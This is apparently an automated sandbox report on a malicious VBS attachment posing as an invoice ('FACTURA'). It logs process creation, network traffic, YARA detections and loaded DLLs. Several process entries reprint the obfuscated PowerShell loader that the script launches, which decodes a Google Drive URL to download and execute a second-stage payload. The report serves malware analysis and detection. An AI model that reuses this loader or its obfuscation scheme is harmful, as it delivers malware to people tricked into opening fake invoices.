Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.1485282092.000001C5818BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbHP
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C58048C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C58048C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1485282092.000001C5812CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580488000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 142.250.105.102:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.8:49707 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_1644.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1644, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6649
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6649			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl			Jump to behavior

Source: FACTURA 130424435.vbs

Initial sample: Strings found which are bigger than 50

Source: amsi64_1644.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1644, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: powershell.exe, 00000002.00000002.1525907619.000001C5EA9ED000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBPe

Source: classification engine

Classification label: mal100.expl.evad.winVBS@6/6@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Cabassou.Tun

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xef2zxxa.h5r.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FACTURA 130424435.vbs	ReversingLabs: Detection: 23%
Source: FACTURA 130424435.vbs	Virustotal: Detection: 11%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
